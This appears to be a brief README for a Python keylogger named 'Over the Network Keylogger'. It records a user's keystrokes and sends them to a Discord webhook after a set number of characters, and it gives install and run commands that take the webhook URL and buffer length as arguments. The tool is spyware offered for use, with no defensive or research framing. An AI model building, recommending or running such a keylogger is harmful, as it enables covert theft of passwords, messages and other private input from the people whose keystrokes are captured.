Over the Network Keylogger is a simple python based program that keeps track of your keystrokes. The recorded keystrokes will be sent by Discord's webhook after a certain length of character has been reached.
pip install -r requirements.txt
python keylogger.py --url=<WEBHOOK_URL> --length=<LENGTH>